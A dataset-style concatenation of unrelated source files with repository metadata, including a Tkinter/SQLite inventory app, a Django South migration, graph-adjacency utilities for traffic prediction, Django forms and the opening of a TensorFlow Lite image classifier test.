lbl_product_id=Label(Manage_Frame,text="Product ID : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_product_id.grid(row=1, column=0, padx=10, pady=10,sticky ="w")
txt_product_id=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.product_id_var)
txt_product_id.bind("<KeyRelease>", caps)
txt_product_id.grid(row=1, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_type=Label(Manage_Frame,text="Product Type : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_type.grid(row=2, column=0, padx=10, pady=10,sticky ="w")
txt_type=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.product_type_var)
txt_type.bind("<KeyRelease>", caps)
txt_type.grid(row=2, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_model_no=Label(Manage_Frame,text="Model No : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_model_no.grid(row=3, column=0, padx=10, pady=10,sticky ="w")
txt_model_id=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.model_no_var)
txt_model_id.bind("<KeyRelease>", caps)
txt_model_id.grid(row=3, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_manufacturer=Label(Manage_Frame,text="Manufacturer : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_manufacturer.grid(row=4, column=0, padx=10, pady=10,sticky ="w")
txt_manufacturer=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.manufacturer_var)
txt_manufacturer.bind("<KeyRelease>", caps)
txt_manufacturer.grid(row=4, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_department=Label(Manage_Frame,text="Department : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_department.grid(row=5, column=0, padx=10, pady=10,sticky ="w")
combo_department=ttk.Combobox(Manage_Frame, width=18, font=("", 13, "bold" ), state="readonly" , textvariable=self.department_var)
combo_department["values"]=("COMPUTER","ELECTRICAL","CIVIL","MECHANICAL","CHEMICAL","I.T.")
combo_department.current(0)
combo_department.grid(row=5, column=1, padx=10, pady=10,sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_location=Label(Manage_Frame,text="Location : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_location.grid(row=6, column=0, padx=10, pady=10,sticky ="w")
txt_location=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.location_var)
txt_location.bind("<KeyRelease>", caps)
txt_location.grid(row=6, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_incharge=Label(Manage_Frame,text="Incharge : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_incharge.grid(row=7, column=0, padx=10, pady=10,sticky ="w")
txt_incharge=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.incharge_var)
txt_incharge.bind("<KeyRelease>", caps)
txt_incharge.grid(row=7, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_comment=Label(Manage_Frame,text="Comment : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_comment.grid(row=8, column=0, padx=10, pady=10,sticky ="w")
self.txt_comment=Text(Manage_Frame, width=20, height=3, bd=2, relief=GROOVE, font=("times new roman", 13 , ""))
self.txt_comment.grid(row=8, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
#===================================================================================================================================
#==========================BUTTON_FRAME=============================================================================================
#===================================================================================================================================
Button_Frame=Frame(Manage_Frame, bd=4, relief=RIDGE, bg="yellow")
Button_Frame.place(x=5, y=500, width=330, height=50)
#------------------------------------------------------------------------------------------------------------------------------------
add_button=Button(Button_Frame, text="Add", width=8, highlightbackground="yellow", command=self.add_items)
add_button.grid(row=0, column=0, padx=5, pady=7)
#------------------------------------------------------------------------------------------------------------------------------------
update_button=Button(Button_Frame, text="Update", width=8, highlightbackground="yellow", command=self.update_data)
update_button.grid(row=0, column=1, padx=5, pady=7)
#------------------------------------------------------------------------------------------------------------------------------------
delete_button=Button(Button_Frame, text="Delete", width=8, highlightbackground="yellow", command=self.delete_data)
delete_button.grid(row=0, column=2, padx=5, pady=7)
#------------------------------------------------------------------------------------------------------------------------------------
clear_button=Button(Button_Frame, text="Clear", width=10, highlightbackground="yellow", command=self.clear)
clear_button.grid(row=0, column=3, padx=5, pady=7)
#===================================================================================================================================
#==========================DETAIL_FRAME=============================================================================================
#===================================================================================================================================
Detail_Frame=Frame(self.root, bd=4, relief=RIDGE, bg="crimson")
Detail_Frame.place(x=370, y=80, width=820, height=570)
#===================================================================================================================================
#==========================SEARCH_FRAME=============================================================================================
#===================================================================================================================================
Search_Frame=Frame(Detail_Frame, bd=4, relief=RIDGE, bg="yellow")
Search_Frame.place(x=10, y=10, width=792, height=60)
lbl_search=Label(Search_Frame,text="Search By : ", font=("", 13 , "bold"), bg="yellow", fg="red")
lbl_search.grid(row=0, column=0, padx=10, pady=10,sticky ="w")
combo_search_by=ttk.Combobox(Search_Frame, width=13, font=("", 13, "" ), state="readonly", textvariable=self.search_by_var)
combo_search_by["values"]=("All","Product ID.","Product Type","Model No","Manufacturer","Department","Location","Incharge")
combo_search_by.current(0)
combo_search_by.grid(row=0, column=1, padx=2, pady=10,sticky ="w")
txt_search=Entry(Search_Frame, width=22,font=("times new roman", 15 ) ,bd=2, relief=GROOVE, textvariable=self.search_txt_var)
txt_search.bind("<KeyRelease>", caps)
txt_search.grid(row=0, column=2, padx=20, pady=10, sticky ="w")
search_button=Button(Search_Frame, text="Search", width=8, highlightbackground="yellow", command=self.search_data)
search_button.grid(row=0, column=3, padx=4, pady=5)
view_button=Button(Search_Frame, text="View All", width=8, highlightbackground="yellow", command=self.view_data)
view_button.grid(row=0, column=4, padx=9, pady=5)
tocsv_button=Button(Search_Frame, text="Export", width=8, highlightbackground="yellow", command=self.export_data)
tocsv_button.grid(row=0, column=5, padx=9, pady=5)
#===================================================================================================================================
#==========================TABLE_FRAME=============================================================================================
#===================================================================================================================================
Table_Frame=Frame(Detail_Frame, bd=4, relief=RIDGE, bg="yellow")
Table_Frame.place(x=10, y=80, width=792, height=472)
scroll_x=Scrollbar(Table_Frame, orient=HORIZONTAL)
scroll_y=Scrollbar(Table_Frame, orient=VERTICAL)
self.View_Table=ttk.Treeview(Table_Frame, columns=("pid","ptype","mno","manufacturer","department","location","incharge","comment"), xscrollcommand=scroll_x.set, yscrollcommand=scroll_y.set)
scroll_x.pack(side=BOTTOM, fill=X)
scroll_y.pack(side=RIGHT, fill=Y)
scroll_x.config(command=self.View_Table.xview)
scroll_y.config(command=self.View_Table.yview)
self.View_Table.heading("pid", text="Product ID.")
self.View_Table.heading("ptype", text="Product Type")
self.View_Table.heading("mno", text="Model No")
self.View_Table.heading("manufacturer", text="Manufacturer")
self.View_Table.heading("department", text="Department")
self.View_Table.heading("location", text="Location")
self.View_Table.heading("incharge", text="Incharge")
self.View_Table.heading("comment", text="Comment")
self.View_Table.column("pid", width=90)
self.View_Table.column("ptype", width=100)
self.View_Table.column("mno", width=120)
self.View_Table.column("manufacturer", width=90)
self.View_Table.column("department", width=120)
self.View_Table.column("location", width=90)
self.View_Table.column("incharge", width=130)
self.View_Table.column("comment", width=250)
self.View_Table["show"]="headings"
self.View_Table.pack(fill=BOTH, expand=1)
self.View_Table.bind("<ButtonRelease-1>", self.get_cursor)
self.view_data()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def add_items(self):
"""Function to ADD item to Database"""
if self.product_id_var.get()=="":
messagebox.showerror("Error","Product ID. cannot be blank!!!")
else:
try:
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute(" insert into dmce_inventory values (?,?,?,?,?,?,?,?)",(
self.product_id_var.get(),
self.product_type_var.get(),
self.model_no_var.get(),
self.manufacturer_var.get(),
self.department_var.get(),
self.location_var.get(),
self.incharge_var.get(),
self.txt_comment.get('1.0',END),
))
con.commit()
self.view_data()
con.close()
except:
pass
else:
self.clear()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def export_data(self):
"""Function to Expoet data into various Formats"""
que1 = messagebox.askquestion( "Export",
"Do you want to export to CSV?",
icon ='info')
if que1 == 'yes':
toCSV()
que2 = messagebox.askquestion( "Export",
"Do you want to export to PDF?",
icon ='info')
if que2 == 'yes':
CsvtoPDF()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def view_data(self):
"""Function to VIEW data into Table"""
self.search_txt_var.set("")
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute("select * from dmce_inventory")
rows=cur.fetchall()
self.View_Table.delete(*self.View_Table.get_children())
if len(rows)!=0:
for row in rows:
self.View_Table.insert("", END, values=row)
con.commit()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def clear(self):
"""Function to CLEAR all Input Fields"""
self.product_id_var.set("")
self.product_type_var.set("")
self.model_no_var.set("")
self.manufacturer_var.set("")
self.location_var.set("")
self.incharge_var.set("")
self.txt_comment.delete("1.0", END)
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def get_cursor(self,event):
"""Function to SELECT a particular item"""
try:
cursor_row=self.View_Table.focus()
contents=self.View_Table.item(cursor_row)
row=contents["values"]
self.product_id_var.set(row[0])
self.product_type_var.set(row[1])
self.model_no_var.set(row[2])
self.manufacturer_var.set(row[3])
self.department_var.set(row[4])
self.location_var.set(row[5])
self.incharge_var.set(row[6])
self.txt_comment.delete("1.0", END)
self.txt_comment.insert(END, row[7])
except:
pass
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def update_data(self):
"""Function to UPDATE an item of Database"""
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute("update dmce_inventory set product_type=? , model_no=? , manufacturer=? , department=? , location=? ,incharge=?, comment=? where product_id=?",(
self.product_type_var.get(),
self.model_no_var.get(),
self.manufacturer_var.get(),
self.department_var.get(),
self.location_var.get(),
self.incharge_var.get(),
self.txt_comment.get('1.0',END),
self.product_id_var.get()
))
con.commit()
self.view_data()
self.clear()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def delete_data(self):
"""Function to DELETE an item from the Database"""
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute("delete from dmce_inventory where product_id=?",(self.product_id_var.get(),))
con.commit()
self.view_data()
self.clear()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def search_data(self):
"""Function to Search for items in Database"""
con=sqlite3.connect('inventory.db')
cur=con.cursor()
if self.search_by_var.get()=="Product ID.":
cur.execute("select * from dmce_inventory where product_id=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Product Type":
cur.execute("select * from dmce_inventory where product_type=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Model No":
cur.execute("select * from dmce_inventory where model_no=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Manufacturer":
cur.execute("select * from dmce_inventory where manufacturer=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Department":
cur.execute("select * from dmce_inventory where department=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Location":
cur.execute("select * from dmce_inventory where location=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Incharge":
cur.execute("select * from dmce_inventory where incharge=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
else:
cur.execute("select * from dmce_inventory where product_id=? OR product_type=? OR model_no=? OR manufacturer=? OR department=? OR location=? OR incharge=?", (
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
))
rows=cur.fetchall()
self.View_Table.delete(*self.View_Table.get_children())
if len(rows)!=0:
for row in rows:
self.View_Table.insert("", END, values=row)
con.commit()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
"""START THE PROGRAM"""
create_database()
root = Tk()
root.title("Inventory Tracking System")
root.iconbitmap("its_icon.ico")
ob = Inventory(root)
root.mainloop()
| 56.598291
| 218
| 0.39516
|
bd76b6b6ee215e096b2b0924ab60e7d5ae5c5080
| 6,057
|
py
|
Python
|
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
|
kohout/djangocms-getaweb-events
|
e02f635748c919ba4092790d5c14d05645cd8bc9
|
[
"Unlicense"
] | null | null | null |
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
|
kohout/djangocms-getaweb-events
|
e02f635748c919ba4092790d5c14d05645cd8bc9
|
[
"Unlicense"
] | null | null | null |
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
|
kohout/djangocms-getaweb-events
|
e02f635748c919ba4092790d5c14d05645cd8bc9
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Event.target_page'
db.add_column(u'djangocms_events_event', 'target_page',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'], null=True, blank=True),
keep_default=False)
# Removing M2M table for field target_page on 'Event'
db.delete_table(db.shorten_name(u'djangocms_events_event_target_page'))
def backwards(self, orm):
# Deleting field 'Event.target_page'
db.delete_column(u'djangocms_events_event', 'target_page_id')
# Adding M2M table for field target_page on 'Event'
m2m_table_name = db.shorten_name(u'djangocms_events_event_target_page')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('event', models.ForeignKey(orm[u'djangocms_events.event'], null=False)),
('site', models.ForeignKey(orm[u'sites.site'], null=False))
))
db.create_unique(m2m_table_name, ['event_id', 'site_id'])
models = {
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
u'djangocms_events.event': {
'Meta': {'ordering': "['start_date', 'start_time', 'end_date', 'end_time']", 'object_name': 'Event'},
'description': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['djangocms_events.Tag']", 'null': 'True', 'blank': 'True'}),
'target_page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'})
},
u'djangocms_events.eventslist': {
'Meta': {'object_name': 'EventsList', '_ormbases': ['cms.CMSPlugin']},
'archive': ('django.db.models.fields.CharField', [], {'default': "('all', u'All Events')", 'max_length': '50'}),
'category': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['djangocms_events.Tag']", 'null': 'True', 'blank': 'True'}),
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'max_item_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'target_page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'djangocms_events.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['djangocms_events']
| 66.56044
| 177
| 0.579165
|
6d483295229e88d0b0fe472751c0f43066742443
| 4,260
|
py
|
Python
|
lib/utils.py
|
tijsmaas/TrafficPrediction
|
9129faea8fee8c2d90595d2974f0b11030ad2674
|
[
"MIT"
] | 17
|
2020-08-16T04:17:57.000Z
|
2022-02-28T01:13:49.000Z
|
lib/utils.py
|
tijsmaas/TrafficPrediction
|
9129faea8fee8c2d90595d2974f0b11030ad2674
|
[
"MIT"
] | null | null | null |
lib/utils.py
|
tijsmaas/TrafficPrediction
|
9129faea8fee8c2d90595d2974f0b11030ad2674
|
[
"MIT"
] | 5
|
2020-05-23T07:47:15.000Z
|
2021-11-16T15:05:05.000Z
|
import scipy.sparse as sp
from lib.dataloaders.dataloader import *
from scipy.sparse import linalg
import numpy as np
import pickle
def sym_adj(adj):
"""Symmetrically normalize adjacency matrix."""
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1))
d_inv_sqrt = np.power(rowsum, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).astype(np.float32).todense()
def asym_adj(adj):
adj = sp.coo_matrix(adj)
rowsum = np.array(adj.sum(1)).flatten()
d_inv = np.power(rowsum, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
d_mat= sp.diags(d_inv)
return d_mat.dot(adj).astype(np.float32).todense()
def calculate_normalized_laplacian(adj):
"""
# L = D^-1/2 (D-A) D^-1/2 = I - D^-1/2 A D^-1/2
# D = diag(A 1)
:param adj:
:return:
"""
adj = sp.coo_matrix(adj)
d = np.array(adj.sum(1))
d_inv_sqrt = np.power(d, -0.5).flatten()
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
d_mat_inv_sqrt = sp.diags(d_inv_sqrt)
normalized_laplacian = sp.eye(adj.shape[0]) - adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()
return normalized_laplacian
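# Quick illustrative check (comment only, not part of the original module): for the two-node
# graph A = [[0, 1], [1, 0]] the degree matrix is the identity, so
# L = I - D^-1/2 A D^-1/2 = [[1, -1], [-1, 1]].
#   L = calculate_normalized_laplacian(np.array([[0, 1], [1, 0]]))
#   print(L.todense())  # [[ 1. -1.]
#                       #  [-1.  1.]]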
def calculate_random_walk_matrix(adj_mx):
adj_mx = sp.coo_matrix(adj_mx)
d = np.array(adj_mx.sum(1))
d_inv = np.power(d, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
d_mat_inv = sp.diags(d_inv)
random_walk_mx = d_mat_inv.dot(adj_mx).tocoo()
return random_walk_mx
def calculate_reverse_random_walk_matrix(adj_mx):
return calculate_random_walk_matrix(np.transpose(adj_mx))
def calculate_scaled_laplacian(adj_mx, lambda_max=2, undirected=True):
if undirected:
adj_mx = np.maximum.reduce([adj_mx, adj_mx.T])
L = calculate_normalized_laplacian(adj_mx)
if lambda_max is None:
lambda_max, _ = linalg.eigsh(L, 1, which='LM')
lambda_max = lambda_max[0]
L = sp.csr_matrix(L)
M, _ = L.shape
I = sp.identity(M, format='csr', dtype=L.dtype)
L = (2 / lambda_max * L) - I
return L.astype(np.float32)
def get_total_trainable_parameter_size():
"""
Calculates the total number of trainable parameters in the current graph.
:return:
"""
total_parameters = 0
import tensorflow as tf
for variable in tf.trainable_variables():
# shape is an array of tf.Dimension
total_parameters += np.product([x.value for x in variable.get_shape()])
return total_parameters
def load_pickle(pickle_file):
try:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f)
except UnicodeDecodeError as e:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f, encoding='latin1')
except Exception as e:
print('Unable to load data ', pickle_file, ':', e)
raise
return pickle_data
def load_adj(pkl_filename, adjtype):
sensor_ids, sensor_id_to_ind, adj_mx = load_pickle(pkl_filename)
if adjtype == "scalap":
adj = [calculate_scaled_laplacian(adj_mx)]
elif adjtype == "normlap":
adj = [calculate_normalized_laplacian(adj_mx).astype(np.float32).todense()]
elif adjtype == "symnadj":
adj = [sym_adj(adj_mx)]
elif adjtype == "transition":
adj = [asym_adj(adj_mx)]
elif adjtype == "doubletransition":
adj = [asym_adj(adj_mx), asym_adj(np.transpose(adj_mx))]
elif adjtype == "random_walk":
adj = [np.transpose(calculate_random_walk_matrix(adj_mx))]
elif adjtype == "dual_random_walk":
adj = [np.transpose(calculate_random_walk_matrix(adj_mx)),
np.transpose(calculate_random_walk_matrix(np.transpose(adj_mx)))]
elif adjtype == "identity":
adj = [np.diag(np.ones(adj_mx.shape[0])).astype(np.float32)]
else:
error = 0
assert error, "adj type not defined"
return sensor_ids, sensor_id_to_ind, adj
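# Illustrative call (comment only; the pickle path is hypothetical): "doubletransition"
# yields the forward and backward transition matrices used by diffusion-convolution models.
#   sensor_ids, sensor_id_to_ind, adj = load_adj("data/adj_mx.pkl", "doubletransition")
#   # adj is then a list of two dense float32 matrices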
def load_dataset(dataset_file, batch_size, val_batch_size=None, test_batch_size=None, **kwargs):
ds = Dataset(dataset_file)
ds.load_category('train', batch_size)
ds.data['train_loader'].shuffle()
ds.load_category('val', val_batch_size)
ds.load_category('test', test_batch_size)
return ds
| 34.634146
| 113
| 0.669718
|
5e0ffb9e4479ab798e2c84cde42a609743d1a419
| 26
|
py
|
Python
|
python/testData/psi/DictMissingValue.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/psi/DictMissingValue.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/psi/DictMissingValue.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
dl = {key1: value1, key2:}
| 26
| 26
| 0.615385
|
30ef5b615a6040925aa0ff2239d3c905067bf712
| 1,034
|
py
|
Python
|
rapidez/main/forms.py
|
asisbagga-dev/RapidezWriter
|
e1453e69978b6def402ea64805415e6758ee4459
|
[
"MIT"
] | null | null | null |
rapidez/main/forms.py
|
asisbagga-dev/RapidezWriter
|
e1453e69978b6def402ea64805415e6758ee4459
|
[
"MIT"
] | 11
|
2021-04-06T18:30:11.000Z
|
2022-03-12T00:53:28.000Z
|
rapidez/main/forms.py
|
asisbagga-dev/RapidezWriter
|
e1453e69978b6def402ea64805415e6758ee4459
|
[
"MIT"
] | null | null | null |
from django import forms
from .models import Database, Category, Testimonials
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class Databaseform(forms.ModelForm):
class Meta:
model = Database
fields = ('heading',
'description',
'banner',
'category')
class Categoryform(forms.ModelForm):
class Meta:
model = Category
fields = '__all__'
class Testimonialform(forms.ModelForm):
class Meta:
model = Testimonials
fields = '__all__'
class SignUpForm(UserCreationForm):
first_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
last_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', )
| 33.354839
| 97
| 0.667311
|
e2d8eccfa0868ce494e9b037529d59c28989f8cf
| 10,690
|
py
|
Python
|
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
|
ccen-stripe/tflite-support
|
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
|
ccen-stripe/tflite-support
|
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
|
ccen-stripe/tflite-support
|
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for image_classifier."""
import enum
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_lite_support.python.task.core import base_options as base_options_module
from tensorflow_lite_support.python.task.processor.proto import bounding_box_pb2
from tensorflow_lite_support.python.task.processor.proto import class_pb2
from tensorflow_lite_support.python.task.processor.proto import classification_options_pb2
from tensorflow_lite_support.python.task.processor.proto import classifications_pb2
from tensorflow_lite_support.python.task.vision import image_classifier
from tensorflow_lite_support.python.task.vision.core import tensor_image
from tensorflow_lite_support.python.test import test_util
_BaseOptions = base_options_module.BaseOptions
_Category = class_pb2.Category
_Classifications = classifications_pb2.Classifications
_ClassificationResult = classifications_pb2.ClassificationResult
_ImageClassifier = image_classifier.ImageClassifier
_ImageClassifierOptions = image_classifier.ImageClassifierOptions
_MODEL_FILE = 'mobilenet_v2_1.0_224.tflite'
_IMAGE_FILE = 'burger.jpg'
_EXPECTED_CLASSIFICATION_RESULT = _ClassificationResult(classifications=[
_Classifications(
categories=[
_Category(
index=934,
score=0.739974,
display_name='',
category_name='cheeseburger'),
_Category(
index=925,
score=0.026929,
display_name='',
category_name='guacamole'),
_Category(
index=932,
score=0.025737,
display_name='',
category_name='bagel')
],
head_index=0,
head_name='')
])
_ALLOW_LIST = ['cheeseburger', 'guacamole']
_DENY_LIST = ['cheeseburger']
_SCORE_THRESHOLD = 0.5
_MAX_RESULTS = 3
def _create_classifier_from_options(base_options, **classification_options):
classification_options = classification_options_pb2.ClassificationOptions(
**classification_options)
options = _ImageClassifierOptions(
base_options=base_options, classification_options=classification_options)
classifier = _ImageClassifier.create_from_options(options)
return classifier
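# For example (illustrative, model_path being any compatible classification model):
#   _create_classifier_from_options(_BaseOptions(file_name=model_path),
#                                   max_results=3, score_threshold=0.5)
# builds an _ImageClassifier with both classification options populated.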
class ModelFileType(enum.Enum):
FILE_CONTENT = 1
FILE_NAME = 2
class ImageClassifierTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
super().setUp()
self.test_image_path = test_util.get_test_data_path(_IMAGE_FILE)
self.model_path = test_util.get_test_data_path(_MODEL_FILE)
def test_create_from_file_succeeds_with_valid_model_path(self):
# Creates with default option and valid model file successfully.
classifier = _ImageClassifier.create_from_file(self.model_path)
self.assertIsInstance(classifier, _ImageClassifier)
def test_create_from_options_succeeds_with_valid_model_path(self):
# Creates with options containing model file successfully.
base_options = _BaseOptions(file_name=self.model_path)
options = _ImageClassifierOptions(base_options=base_options)
classifier = _ImageClassifier.create_from_options(options)
self.assertIsInstance(classifier, _ImageClassifier)
def test_create_from_options_fails_with_invalid_model_path(self):
# Invalid empty model path.
with self.assertRaisesRegex(
ValueError,
r"ExternalFile must specify at least one of 'file_content', "
r"'file_name' or 'file_descriptor_meta'."):
base_options = _BaseOptions(file_name='')
